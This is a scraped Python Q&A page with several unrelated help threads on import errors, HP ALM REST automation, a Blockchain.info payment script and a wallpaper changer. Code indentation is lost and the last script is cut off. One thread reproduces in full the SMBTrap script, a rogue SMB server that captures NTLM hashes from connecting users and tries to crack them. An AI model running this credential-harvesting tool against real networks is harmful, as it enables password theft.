import doesn't works? - python

i'm doing some unittest with python, and all was going ok, but i got a problem so weird, with a import i think, follow the problem:
i'm trying to create a object GlanceApi in my test, like another tests that i've done, but i got this error:
======================================================================
ERROR: setUpClass (__main__.TestGlance)
----------------------------------------------------------------------
Traceback (most recent call last):
File "glance_tests.py", line 22, in setUpClass
self.glnce = glance.GlanceApi("")
AttributeError: 'module' object has no attribute 'GlanceApi'
and this is my code:
import unittest
import json
import time
import sys
sys.path.append("../src")
import glance
import novaapiclient
class TestGlance(unittest.TestCase):
#classmethod
def setUpClass(self):
confFile = file('config.txt', 'r+w')
configs = ""
for line in confFile:
if not (line.startswith('#')) and len(line) != 0:
configs = line.split(';')
novaAPI = novaapiclient.NovaApiClient(str(configs[0]))
novaAPI.make_auth(configs[1], configs[2], configs[3])
self.glnce = glance.GlanceApi() # << HERE ERROR
self.glnce.set_auth_obj(novaAPI.get_auth_obj())
It looks like another tests that i've done, but doesn't works to this case.
Thanks in advance.
This is the glance source:
import pycurl
import cStringIO
import os
class GlanceApi:
def __init__(self):
self.auth = ""
self.http_handler = ""
def set_auth_obj(self, authenticate):
self.auth = authenticate
def list_images(self, is_public=False, with_details=False):
if self.auth.is_authed() == False:
return False
self.http_handler = pycurl.Curl()
printer = cStringIO.StringIO()
if with_details == False:
url_complement = "/images"
else:
url_complement = "/images/detail"
if is_public == False:
full_url = str(self.auth.get_image_URL() + url_complement)
else:
full_url = str(self.auth.get_image_URL()[:30] + url_complement)
headers = ["X-Auth-Token:%s" % str(self.auth.get_auth_token())]
self.http_handler.setopt(pycurl.URL, full_url)
self.http_handler.setopt(pycurl.HTTPGET, 1)
self.http_handler.setopt(pycurl.HTTPHEADER, headers)
self.http_handler.setopt(pycurl.WRITEFUNCTION, printer.write)
self.http_handler.perform()
http_code = int(self.http_handler.getinfo(pycurl.HTTP_CODE))
self.http_handler.close()
return printer.getvalue()
def get_image_metadata(self, id, is_public=False):
if self.auth.is_authed() == False:
return False
self.http_handler = pycurl.Curl()
printer = cStringIO.StringIO()
url_complement = "/images/%s" % id
# Setting the request url according the is_public parameter.
if is_public == False:
full_url = str(self.auth.get_image_URL() + url_complement)
else:
full_url = str(self.auth.get_image_URL()[:30] + url_complement)
headers = ["X-Auth-Token:%s" % str(self.auth.get_auth_token())]
self.http_handler.setopt(pycurl.URL, full_url)
self.http_handler.setopt(pycurl.CUSTOMREQUEST, 'HEAD')
self.http_handler.setopt(pycurl.HTTPHEADER, headers)
self.http_handler.setopt(pycurl.WRITEFUNCTION, printer.write)
self.http_handler.perform()
http_code = int(self.http_handler.getinfo(pycurl.HTTP_CODE))
self.http_handler.close()
return printer.getvalue()
def add_image(self, file_path, name, is_public=False):
# Verifying if the user is authenticated.
if self.auth.is_authed() == False:
return False
self.http_handler = pycurl.Curl()
printer = cStringIO.StringIO()
url_complement = "/images"
if is_public == False:
full_url = str(self.auth.get_image_URL() + url_complement)
else:
full_url = str(self.auth.get_image_URL()[:30] + url_complement)
size = os.path.getsize(file_path)
image = [(str(name), (pycurl.FORM_FILE, str(file_path)))]
headers = ["X-Auth-Token:%s" % str(self.auth.get_auth_token()), "x-image-meta-name:%s" % name, "x-image-meta-size:%s" % str(size)]
if is_public == True:
headers.append("x-image-meta-is-public:true")
self.http_handler.setopt(pycurl.URL, full_url)
self.http_handler.setopt(self.http_handler.HTTPPOST, image)
self.http_handler.setopt(pycurl.HTTPHEADER, headers)
self.http_handler.setopt(pycurl.WRITEFUNCTION, printer.write)
self.http_handler.perform()
http_code = int(self.http_handler.getinfo(pycurl.HTTP_CODE))
self.http_handler.close()
return printer.getvalue()
this is the directory structure:
Project
+ src/
- glance.py
- ...
+ Tests/
- glance_tests.py
- ...
EDIT
RESOLVED, how? i've no idea, but i've done this, i create a new file named glanceapi.py, and copy the content the glance.py file, change the name at import and it works, i have no idea that what's the problem, could be some python bug, well, i want to say thanks to people that tried to help me.

Go to IDLE, and see what the PYTHONPATH is.
import sys
sys.path
And if the place where Glance is located is not found in the path, I suppose you would have to insert/append it using sys.path.append(). Look at how to do your parameters and stuff here: http://effbot.org/librarybook/sys.htm
EDIT: Let me know if this does not work.

Related

Getting Import/Library issue in my robotframework

Getting Import/Library issues in my robot framework, I've Customlib file where all my custom functions reside while trying to import the Customlib getting an error
[enter image description here][1]
[enter image description here][2]
[1]: https://i.stack.imgur.com/poPzQ.png
[2]: https://i.stack.imgur.com/qkbxK.png
CustomLib Code:
robot is complaining Setup failed: No keyword with name Customlib.get config test data
import os
# Declaring empty list for test data and config file
testData = {}
configTestData = {}
class CustomLib:
ROBOT_LIBRARY_SCOPE = 'Test Case'
# Function for getting data from confi file and test data file altogether
#staticmethod
def get_global_config_data_and_test_data(testdata_filename):
configpath = os.path.dirname(os.path.abspath(__file__))
print(configpath)
configpath1 = configpath.replace("Utils", "")
configpath = configpath1.replace(configpath1, "config.properties")
# configpath=configpath.replace("Utils", "config.properties")
try:
file = open(configpath)
for line in file:
content = line.split("=")
firstArgument = content[0]
secondArgument = content[1]
a = firstArgument.rstrip('\n')
b = secondArgument.rstrip('\n')
testData[a] = b
except Exception as e:
if hasattr(e, 'message'):
print(e.message)
else:
print(e)
finally:
file.close()
return CustomLib.get_testData_From_PropertiesFile(CustomLib.OS_path_fromat_separator(testdata_filename))
# Function for reading test data from property file
#staticmethod
def get_testData_From_PropertiesFile(propfile):
try:
file = open(propfile)
for line in file:
content = line.split("=")
firstArgument = content[0]
secondArgument = content[1]
a = firstArgument.rstrip('\n')
b = secondArgument.rstrip('\n')
testData[a] = b
except Exception as e:
if hasattr(e, 'message'):
print(e.message)
else:
print(e)
finally:
file.close()
return testData
# FUnction for generating dynamic path which has text in XPATH
def generate_dynamic_xpath(self, locatorvalue, replacement):
after_replacement = locatorvalue.replace('#', replacement)
return after_replacement
# Function for creating report name
def create_report_name(self, testContent, date):
reportname = testContent.replace('date', date)
return reportname
# Function for reading config.properties file
#staticmethod
def get_config_testdata():
configpath = os.path.dirname(os.path.abspath(__file__))
print(configpath)
configpath1 = configpath.replace("Utils", "")
configpath = configpath1.replace(configpath1, "config.properties")
# configpath=configpath.replace("Utils", "config.properties")
print(configpath)
try:
file = open(configpath)
for line in file:
content = line.split("=")
firstArgument = content[0]
secondArgument = content[1]
a = firstArgument.rstrip('\n')
b = secondArgument.rstrip('\n')
configTestData[a] = b
except Exception as e:
if hasattr(e, 'Exception occured while reading properties file'):
print(e.message)
else:
print(e)
finally:
file.close()
return configTestData
# Function to format the path for different OS
#staticmethod
def OS_path_fromat_separator(pathformat):
config_data = {}
config_data = CustomLib.get_config_testdata()
if (config_data['OS'] == 'Windows'):
OSPath = pathformat.replace('$', '//')
return OSPath
else:
OSPath = pathformat.replace('$', '/')
return OSPath
# Function for generating dynamic CSS on the basis of text
def generate_dynamic_CSS(self, locatorvalue, replacement):
after_replacement = locatorvalue.replace('#', replacement)
return after_replacement
def main():
CustomLib.get_global_config_data()
# CustomLib.get_testData_From_PropertiesFile()
if __name__ == '__main__':
main()
I'm using relative path to import custom library. Below is the reference, how to use import using relative path. So this should work.
Library ..${/}foldername${/}customlibrary.py
And you can also use full path and import the library

HP ALM results attachment and status update using python

Challenge : Attach screenshots to Tests in TestLab , update status as PASS/FAIL steps wise (currently updating pass status is enough)
I am expected to write a script in python , to attach test results to the testcases present in test lab, then for each test step Expected result to be set as "As Expected" and pass the TC step by step.
Ie while performing manually, we select the case , click run and then enter "As expected" in expected output area and pass that step, and perfrom this for all teststeps on the test case. This need to be automated. I hav a folder which has Screenshots(similar to TC name), so script shoudl upload the screenshots and update the status.
What I have tried so far :
I was able to connect to alm , with partial testcase name, I was able to pull full testcase name from testplan, but unfortunately i am still struggling to achieve the final goal.
My code so far :
import win32com
from win32com.client import Dispatch
import codecs
import re
import json
# Login Credentials
qcServer = "https://almurl.saas.microfocus.com/qcbin/"
qcUser = "my_username"
qcPassword = "pwd"
qcDomain = "domain"
testList = []
testdict = {}
project = "Crew_Management"
# Do the actual login
td = win32com.client.Dispatch("TDApiOle80.TDConnection.1")
td.InitConnectionEx(qcServer)
td.Login(qcUser,qcPassword)
td.Connect(qcDomain,project)
if td.Connected == True:
print ("System: Logged in to " +project)
else:
print ("Connect failed to " +project)
mg = td.TreeManager # Tree manager
name = ['TC001','TC002','TC003','TC003','TC004','TC005','TC006','TC007','TC008','TC009','TC010','TC011','TC012','TC013','TC014']
folder = mg.NodeByPath('Subject\\Test Factory\\MPG\\MPG Regression Test_Yearly Request\\GUI')
for x in name:
testList = folder.FindTests(x)
#print(type(testList))
print(testList[0].Name)
print(testList[0].DesStepsNum)
td.Disconnect()
td.Logout()
Any help or guidance is much appreciated !
Assuming that you have working experience in Python. Here I am writing all the different functions needed to complete your task.
Reference: https://admhelp.microfocus.com/alm/api_refs/REST_TECH_PREVIEW/ALM_REST_API_TP.html
Global Variable
import re
import json
import datetime
import time
import sys
import os, fnmatch
from os import listdir
from os.path import isfile, join
from xml.etree.ElementTree import Element, SubElement, tostring, parse
import glob
from requests.auth import HTTPBasicAuth
import requests
ALM_USER_NAME = ""
ALM_PASSWORD = ""
ALM_DOMAIN = ""
ALM_URL = ""
AUTH_END_POINT = ALM_URL + "authentication-point/authenticate"
QC_SESSION_END_POINT = ALM_URL + "rest/site-session"
QC_LOGOUT_END_POINT = ALM_URL + "authentication-point/logout"
ALM_MIDPOINT = "rest/domains/" + ALM_DOMAIN + "/projects/"
PATH_SEP = os.path.sep
Login Function
def alm_login(self):
"""
Function : alm_login
Description : Authenticate user
Parameters : global parameter
alm_username - ALM User
alm_password - ALM Password
"""
response = self.alm_session.post(AUTH_END_POINT,
auth=HTTPBasicAuth(ALM_USER_NAME, ALM_PASSWORD))
if response.status_code == 200:
response = self.alm_session.post(QC_SESSION_END_POINT)
if response.status_code == 200 | response.status_code == 201:
print "ALM Authentication successful"
else:
print "Error: ", response.staus_code
else:
print "Error: ", response.staus_code
self.alm_session.headers.update({'Accept':'application/json',
'Content-Type': 'application/xml'})
return
Logout Function
After the logout method is successful the cookie should expire
def alm_logout(self):
'''
Function : alm_logout
Description : terminate user session
Parameters : No Parameters
'''
response = self.alm_session.post(QC_LOGOUT_END_POINT)
print "Logout successful", response.headers.get('Expires'), response.status_code
return
Get Test Set Folder
If the test cases span across multiple test suites then it is better to get the test set folder first and find the necessary test suite.
def find_test_set_folder(self):
'''
Function : find_test_set_folder
Description : This sends a couple of http request and authenticate the user
Parameters : 1 Parameter
test_set_path - ALM test set path
'''
json_str = json.loads(self.find_folder_id(self.test_set_path.split("\\"), "test-set-folders"
, 0, "id"))
if 'entities' in json_str:
return create_key_value(json_str['entities'][0]['Fields'])['id']
else:
return create_key_value(json_str['Fields'])['id']
Get Folder Id
This method will help you find the Test Suite Folder ID or Test Plan Folder Id.
def find_folder_id(self, arrfolder, str_api, parent_id, fields):
'''
Function : find_folder_id
Description : This sends a couple of http request and authenticate the user
Parameters : 1 Parameter
test_set_path - ALM test set path
'''
for foldername in arrfolder:
payload = {"query": "{name['" + foldername + "'];parent-id[" + str(parent_id) + "]}",
"fields": fields}
response = self.alm_session.get(ALM_URL + ALM_MIDPOINT + "/" + str_api, params=payload)
obj = json.loads(response.text)
if obj["TotalResults"] >= 1:
parent_id = get_field_value(obj['entities'][0]['Fields'], "id")
# print("folder id of " + foldername + " is " + str(parent_id))
else:
# print("Folder " + foldername + " does not exists")
inputdata = dict()
inputdata['Type'] = str_api[0:len(str_api) - 1]
inputdata['name'] = foldername
inputdata['parent-id'] = str(parent_id)
data = generate_xml_data(inputdata)
response = self.alm_session.post(ALM_URL + ALM_MIDPOINT + "/" + str_api, data=data)
obj = json.loads(response.text)
if response.status_code == 200 | response.status_code == 201:
parent_id = get_field_value(obj['Fields'], "id")
# print("folder id of " + foldername + " is " + str(parent_id))
return response.text
Create Run Instance
Before updating the testing status, we must create a run instance for the test.
def create_run_instance(self, test_set_id, test_map):
'''
Function : create_run_instance
Description : Create new run instances
Parameters : Test Set Id
'''
str_api = "test-instances"
fields = "id,test-id,test-config-id,cycle-id"
payload = {"query": "{cycle-id['" + test_set_id + "']}", "fields": fields,
"page-size": 5000}
response = self.alm_session.get(ALM_URL + ALM_MIDPOINT + "/" + str_api, params=payload)
obj = json.loads(response.text)
run_instance_post = "<Entities>"
for entity in obj["entities"]:
run_name = re.sub('[-:]', '_',
'automation_' + datetime.datetime.fromtimestamp(time.time()).strftime(
'%Y-%m-%d %H:%M:%S'))
temp_map = create_key_value(entity["Fields"])
_test_id = int(temp_map['test-id'])
self.parser_temp_dic[_test_id]['testcycl-id'] = temp_map['id']
self.parser_temp_dic[_test_id]['test-config-id'] = temp_map['test-config-id']
self.parser_temp_dic[_test_id]['test-id'] = temp_map['test-id']
self.parser_temp_dic[_test_id]['cycle-id'] = temp_map['cycle-id']
# parser_temp_dic[int(temp_map['test-id'])]['status'].sort()
status = "Passed"
if 'Failed' in self.parser_temp_dic[int(temp_map['test-id'])]['status']:
status = 'Failed'
self.parser_temp_dic[int(temp_map['test-id'])]['final-status'] = status
inputdata = dict()
inputdata['Type'] = 'run'
inputdata['name'] = run_name
inputdata['owner'] = ALM_USER_NAME
inputdata['test-instance'] = str(1)
inputdata['testcycl-id'] = str(temp_map['id'])
inputdata['cycle-id'] = str(temp_map['cycle-id'])
inputdata['status'] = 'Not Completed'
inputdata['test-id'] = temp_map['test-id']
inputdata['subtype-id'] = 'hp.qc.run.MANUAL'
data = generate_xml_data(inputdata)
run_instance_post = run_instance_post + data
self.bulk_operation("runs", run_instance_post + "</Entities>", True, "POST")
return
Update Run Instance
def update_run_instance(self, test_set_id):
'''
Function : update_run_instance
Description : Update the test status in run instances
Parameters : No input parameter
'''
fields = "id,test-id"
payload = {"query": "{cycle-id['" + test_set_id + "']}", "fields": fields,
"page-size": 5000}
response = self.alm_session.get(ALM_URL + ALM_MIDPOINT + "/runs", params=payload)
obj = json.loads(response.text)
run_instance_put = "<Entities>"
for entity in obj["entities"]:
if len(entity["Fields"]) != 1:
temp_map = create_key_value(entity["Fields"])
self.parser_temp_dic[int(temp_map['test-id'])]['run-id'] = temp_map['id']
inputdata = dict()
inputdata['Type'] = 'run'
inputdata['id'] = str(temp_map['id'])
intermediate_ = self.parser_temp_dic[int(temp_map['test-id'])]['testcycl-id']
inputdata['testcycl-id'] = str(intermediate_)
inputdata['status'] = self.parser_temp_dic[int(temp_map['test-id'])]['final-status']
data = generate_xml_data(inputdata)
run_instance_put = run_instance_put + data
self.bulk_operation("runs", run_instance_put + "</Entities>", True, "PUT")
return
Upload Result File
Uploading file to any object in ALM
def upload_result_file(self, test_set_id, report_file):
'''
Function : upload_result_file
Description : Upload test result to ALM
'''
payload = open(report_file, 'rb')
headers = {}
headers['Content-Type'] = "application/octet-stream"
headers['slug'] = "test-results" + report_file[report_file.rfind(".")+1: ]
response = self.alm_session.post(ALM_URL + ALM_MIDPOINT + "/test-sets/" +
str(test_set_id) + "/attachments/",
headers=headers, data=payload)
if not (response.status_code == 200 or response.status_code == 201):
print "Attachment step failed!", response.text, response.url, response.status_code
return
Bulk Operation
This is a helper that allows us to POST an array of data.
def bulk_operation(self, str_api, data, isbulk, request_type):
'''
Function : Post Test Case / Test Instance
Description : Generic function to post multiple entities.
Parameters : 3 parameters
str_api - End point name
data - Actual data to post
isbulk - True or False
'''
response = None
headers = {}
try:
if isbulk:
headers['Content-Type'] = "application/xml;type = collection"
if request_type == 'POST':
response = self.alm_session.post(ALM_URL + ALM_MIDPOINT + "/" + str_api, data=data,
headers=headers)
elif request_type == 'PUT':
response = self.alm_session.put(ALM_URL + ALM_MIDPOINT + "/" + str_api, data=data,
headers=headers)
except Exception as err:
print err
if response.status_code == 200 | response.status_code == 201:
return response.text
return response
You can refer this code
https://github.com/arunprabusamy/Python-Libraries/blob/main/alm_RestAPI/almLib.py
You need to send only three values - Test Set ID (Cycle ID), ALM Test ID & Execution Status. The library automatically builds the json payload and creates a test run and update result.

I can not run a python script

I'm new and I use a translator, sorry if you do not understand well
I'm trying to run a python script and I kali linux throws several errors. I do not understand python, I searched in google without finding solution
**root#Alien**:~/SMBTrap/smbtrap# python smbtrap2.py
Traceback (most recent call last):
File "smbtrap2.py", line 6, in <module>
from quickcrack import try_to_crack_hash
File "/root/SMBTrap/smbtrap/quickcrack.py", line 4, in <module>
from bitarray import bitarray
ImportError: No module named bitarray
**root#Alien**:~/SMBTrap/smbtrap#
Below I hit the code of the script I try to run
from impacket import smbserver, smb
import ntpath
from threading import RLock
import json
from quickcrack import try_to_crack_hash
"""
This script acts as an SMB server and gathers credentials from connecting users.
Developed by Brian Wallace #botnet_hutner
"""
sessions = {}
output_file_lock = RLock()
def report_authentication_attempt(connId, auth_details):
global output_file_lock
sessions[connId] = {"authentication": auth_details, "shares": []}
with output_file_lock:
with open("credentials.txt", "a") as f:
f.write(json.dumps(auth_details) + "\n")
if "UnicodePwd" in auth_details and auth_details['UnicodePwd'] != "":
print "{0}: {1}".format(auth_details['client_ip'], auth_details['UnicodePwd'])
password = try_to_crack_hash(auth_details['UnicodePwd'])
if password is not None:
print "{0}: {1}::{2} has password '{3}'".format(auth_details['client_ip'], auth_details["PrimaryDomain"], auth_details['Account'], password)
if "AnsiPwd" in auth_details and auth_details['AnsiPwd'] != "":
print "{0}: {1}".format(auth_details['client_ip'], auth_details['AnsiPwd'])
password = try_to_crack_hash(auth_details['AnsiPwd'])
if password is not None:
print "{0}: {1}::{2} has password '{3}'".format(auth_details['client_ip'], auth_details["PrimaryDomain"], auth_details['Account'], password)
def report_tree_connect_attempt(connId, connect_details):
session = sessions[connId]
if "client_ip" in session:
print "{2}: {0} accessed {1}".format(session['client_ip'], connect_details['Path'], connId)
session['shares'].append(connect_details)
sessions[connId] = session
def smbCommandHook_SMB_COM_SESSION_SETUP_ANDX(connId, smbServer, SMBCommand, recvPacket):
# Accept any authentication except for empty authentication
supplied_creds = False
# The following is impacket code modified to extract credentials
connData = smbServer.getConnectionData(connId, checkStatus=False)
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
# Process Standard Security
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data(flags=recvPacket['Flags2'])
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
# Let's get those credentials
to_extract_from_session_setup_data = [
"Account",
"AnsiPwd",
"NativeLanMan",
"UnicodePwd",
"NativeOS",
"PrimaryDomain",
]
extracted_data = {}
for key in (i for i in to_extract_from_session_setup_data if i in sessionSetupData.__dict__['fields']):
extracted_data[key] = sessionSetupData[key]
if 'AnsiPwd' in extracted_data:
if len([i for i in extracted_data['AnsiPwd'] if i != "\x00"]) == 0:
# It's null, we should just remove it
extracted_data['AnsiPwd'] = ""
elif len(extracted_data['AnsiPwd']) == 24:
if 'UnicodePwd' in extracted_data and extracted_data['AnsiPwd'] == extracted_data['UnicodePwd']:
# Hash has been duplicated across fields, likely NTLM, not LM
extracted_data['AnsiPwd'] = ""
else:
extracted_data['AnsiPwd'] = extracted_data['AnsiPwd'].encode("hex") # long live Python 2.7
extracted_data['AnsiPwd'] = "{1}:$NETLM$1122334455667788${0}".format(extracted_data['AnsiPwd'], extracted_data['Account'] if 'Account' in extracted_data else "")
supplied_creds = True
else:
# its plaintext? lol
supplied_creds = True
pass
if 'UnicodePwd' in extracted_data:
if len(extracted_data['UnicodePwd']) >= 56:
# NTLMv2
hmac = extracted_data['UnicodePwd'][0:16].encode("hex")
rest = extracted_data['UnicodePwd'][16:].encode("hex")
extracted_data['UnicodePwd'] = "{0}::{1}:1122334455667788:{2}:{3}".format(extracted_data['Account'] if 'Account' in extracted_data else "", extracted_data['PrimaryDomain'] if 'PrimaryDomain' in extracted_data else "", hmac, rest)
supplied_creds = True
elif len(extracted_data['UnicodePwd']) == 24:
# NTLMv1?
extracted_data['UnicodePwd'] = extracted_data['UnicodePwd'].encode("hex")
extracted_data['UnicodePwd'] = "{1}:$NETNTLM$1122334455667788${0}".format(extracted_data['UnicodePwd'], extracted_data['Account'] if 'Account' in extracted_data else "")
supplied_creds = True
conn_data = smbServer.getConnectionData(connId, False)
extracted_data['client_ip'] = conn_data['ClientIP']
report_authentication_attempt(connId, extracted_data)
errorCode = smbserver.STATUS_SUCCESS if supplied_creds else smbserver.STATUS_LOGON_FAILURE
connData['Uid'] = 10
respParameters['Action'] = 0
smbServer.log('User %s\\%s authenticated successfully (basic)' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account']))
respData['NativeOS'] = smbserver.encodeSMBString(recvPacket['Flags2'], smbServer.getServerOS())
respData['NativeLanMan'] = smbserver.encodeSMBString(recvPacket['Flags2'], smbServer.getServerOS())
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
connData['Authenticated'] = supplied_creds
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smbCommandHook_SMB_COM_NEGOTIATE(connId, smbServer, SMBCommand, recvPacket):
if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY:
recvPacket['Flags2'] -= smb.SMB.FLAGS2_EXTENDED_SECURITY
return smbserver.SMBCommands.smbComNegotiate(smbserver.SMBCommands(), connId, smbServer, SMBCommand, recvPacket)
def smbCommandHook_SMB_COM_TREE_CONNECT_ANDX(connId, smbServer, SMBCommand, recvPacket):
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
treeConnectAndXData = smb.SMBTreeConnectAndX_Data(flags=recvPacket['Flags2'])
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
path = smbserver.decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
local_path = ntpath.basename(path)
service = smbserver.decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Service'])
report_tree_connect_attempt(connId, {"Path": path, "local_path": local_path, "Service": service})
return smbserver.SMBCommands.smbComTreeConnectAndX(smbserver.SMBCommands(), connId, smbServer, SMBCommand, recvPacket)
# Overriding this allows us to claim we have no shares, so we still get ANDX data, but don't need to share anything
def override_searchShare(connId, share, smbServer):
return None
smbserver.searchShare = override_searchShare
if __name__ == "__main__":
smbConfig = smbserver.ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global', 'server_name', 'server_name')
smbConfig.set('global', 'server_os', 'UNIX')
smbConfig.set('global', 'server_domain', 'WORKGROUP')
smbConfig.set('global', 'log_file', 'smb.log')
smbConfig.set('global', 'credentials_file', '')
smbConfig.add_section('IPC$')
smbConfig.set('IPC$', 'comment', '')
smbConfig.set('IPC$', 'read only', 'yes')
smbConfig.set('IPC$', 'share type', '3')
smbConfig.set('IPC$', 'path', '')
server = smbserver.SMBSERVER(('0.0.0.0', 445), config_parser=smbConfig)
server.processConfigFile()
server.registerNamedPipe('srvsvc', ('0.0.0.0', 4344))
# Auth and information gathering hooks
# Hook session setup to grab the credentials and deny any empty authentication requests
server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, smbCommandHook_SMB_COM_SESSION_SETUP_ANDX)
# Hook the negotiate call to disable SPNEGO
server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, smbCommandHook_SMB_COM_NEGOTIATE)
# Hook tree connect
server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, smbCommandHook_SMB_COM_TREE_CONNECT_ANDX)
server.serve_forever()
It looks like the quickcrack module depends on the external bitarray module. Have you tried installing it, e.g. pip install bitarray?
If you are using SMBTrap the dependencies are listed here.

Invalid JSON object when posting to an API - Python

I am using Blockchain.info's API to send multiple payments. I believe I have everything how it should be however when I run the code I get the following Error: RuntimeError: ERROR: Invalid Recipients JSON. Please make sure it is url encoded and consult the docs. The docs can be found here: https://blockchain.info/api/blockchain_wallet_api
The Python library I am using can be found here: https://github.com/p4u/blockchain.py/blob/master/blockchain.py
The only other post on this issue is posted by the original creator of the library, he said the problem was that the amounts cannot be a decimal, mine are not however.Post can be found here: https://bitcointalk.org/index.php?topic=600870.0
Here is my code:
from __future__ import print_function
from itertools import islice, imap
import csv, requests, json, math
from collections import defaultdict
import requests
import urllib
import json
from os.path import expanduser
import configparser
class Wallet:
guid = 'g'
isAccount = 0
isKey = 0
password1 = 'x'
password2 = 'y'
url = ''
def __init__(self, guid = 'g', password1 = 'x', password2 = 'y'):
if guid.count('-') > 0:
self.isAccount = 1
if password1 == '': # wallet guid's contain -
raise ValueError('No password with guid.')
else:
self.isKey = 1
self.guid = guid
self.url = 'https://blockchain.info/merchant/' + guid + '/'
self.password1 = password1
self.password2 = password2
r = requests.get('http://api.blockcypher.com/v1/btc/main/addrs/A/balance')
balance = r.json()['balance']
with open("Entries#x1.csv") as f,open("winningnumbers.csv") as nums:
nums = set(imap(str.rstrip, nums))
r = csv.reader(f)
results = defaultdict(list)
for row in r:
results[sum(n in nums for n in islice(row, 1, None))].append(row[0])
self.number_matched_0 = results[0]
self.number_matched_1 = results[1]
self.number_matched_2 = results[2]
self.number_matched_3 = results[3]
self.number_matched_4 = results[4]
self.number_matched_5 = results[5]
self.number_matched_5_json = json.dumps(self.number_matched_5, sort_keys = True, indent = 4)
print(self.number_matched_5_json)
if len(self.number_matched_3) == 0:
print('Nobody matched 3 numbers')
else:
self.tx_amount_3 = int((balance*0.001)/ len(self.number_matched_3))
if len(self.number_matched_4) == 0:
print('Nobody matched 4 numbers')
else:
self.tx_amount_4 = int((balance*0.1)/ len(self.number_matched_4))
if len(self.number_matched_5) == 0:
print('Nobody matched 3 numbers')
else:
self.tx_amount_5 = int((balance*0.4)/ len(self.number_matched_5))
self.d = {el: self.tx_amount_5 for el in json.loads(self.number_matched_5_json)}
print(self.d)
self.d_url_enc = urllib.urlencode(self.d)
def Call(self, method, data = {}):
if self.password1 != '':
data['password'] = self.password1
if self.password2 != '':
data['second_password'] = self.password2
response = requests.post(self.url + method,params=data)
json = response.json()
if 'error' in json:
raise RuntimeError('ERROR: ' + json['error'])
return json
def SendPayment(self, toaddr, amount, fromaddr = 'A', shared = 0, fee = 0.0001, note = True):
data = {}
data['to'] = toaddr
data['amount'] = self.tx_amount_5
data['fee'] = fee
data['recipients'] = self.d_url_enc
if fromaddr:
data['from'] = fromaddr
if shared:
data['shared'] = 'true'
if note:
data['note'] = 'n'
response = self.Call('payment',data)
def SendManyPayment(self, fromaddr = True, shared = False, fee = 0.0001, note = True):
data = {}
recipients = self.d_url_enc
data['recipients'] = recipients.__str__().replace("'",'"')
data['fee'] = str(fee)
if fromaddr:
data['from'] = 'A'
if shared:
data['shared'] = 'true'
else:
data['shared'] = 'false'
if note:
data['note'] = 'n'
response = self.Call('sendmany',data)
return response
print(Wallet().SendManyPayment())
Complete runtime error: Traceback (most recent call last):
File "D:\Documents\B\Code\A\jsontest.py", line 125, in <module>
print(Wallet().SendManyPayment())
File "D:\Documents\B\Code\A\jsontest.py", line 121, in SendManyPayment
response = self.Call('sendmany',data)
File "D:\Documents\B\Code\A\jsontest.py", line 86, in Call
raise RuntimeError('ERROR: ' + json['error'])
RuntimeError: ERROR: Invalid Recipients JSON. Please make sure it is url encoded and consult the docs.
What does data['recipients'] contain inside of your SendManyPayment() function? It looks like you are trying to do some manual encoding instead of using json.dumps(recipients)
The docs say it should look like this:
{
"1JzSZFs2DQke2B3S4pBxaNaMzzVZaG4Cqh": 100000000,
"12Cf6nCcRtKERh9cQm3Z29c9MWvQuFSxvT": 1500000000,
"1dice6YgEVBf88erBFra9BHf6ZMoyvG88": 200000000
}
Try this out for send many:
def SendManyPayment(self, fromaddr = True, shared = False, fee = 0.0001, note = True):
data = {}
recipients = self.d_url_enc
# recipients should be a json string FIRST!
data['recipients'] = json.dumps(recipients)
data['fee'] = str(fee)
if fromaddr:
data['from'] = 'A'
if shared:
data['shared'] = 'true'
else:
data['shared'] = 'false'
if note:
data['note'] = 'n'
response = self.Call('sendmany',data)
return response

Automatic background changer using Python 2.7.3 not working, though it should

I'm very new to Ubuntu/Python/Bash/Gnome in general, so I still feel like there's a chance I'm doing something wrong, but it's been 3 days now without success...
Here's what the script is supposed to do:
* [✓] Download 1 random image from wallbase.cc
* [✓] Save it to the same directory that the script is running from
* [x] Set it as the wallpaper
There are two attempts made to set the wallpaper two using different commands and NEITHER work when in the script. There is a print statement (2nd line from the bottom) that spits out the correct terminal command because I can C&P the print result and it works fine, it just doesn't work when it's executed in the script.
#!/usr/bin/env python
import urllib2
import os
from gi.repository import Gio
response = urllib2.urlopen("http://wallbase.cc/random/12/eqeq/1366x768/0.000/100/32")
page_source = response.read()
thlink_pos = page_source.find("ico-X")
address_start = (page_source.find("href=\"", thlink_pos) + 6)
address_end = page_source.find("\"", address_start + 1)
response = urllib2.urlopen(page_source[address_start:address_end])
page_source = response.read()
bigwall_pos = page_source.find("bigwall")
address_start = (page_source.find("src=\"", bigwall_pos) + 5)
address_end = page_source.find("\"", address_start + 1)
address = page_source[address_start:address_end]
slash_pos = address.rfind("/") + 1
pic_name = address[slash_pos:]
bashCommand = "wget " + page_source[address_start:address_end]
os.system(bashCommand)
print "Does my new image exists?", os.path.exists(os.getcwd() + "/" + pic_name)
#attempt 1
settings = Gio.Settings.new("org.gnome.desktop.background")
settings.set_string("picture-uri", "file://" + os.getcwd() + "/" + pic_name)
settings.apply()
#attempt 2
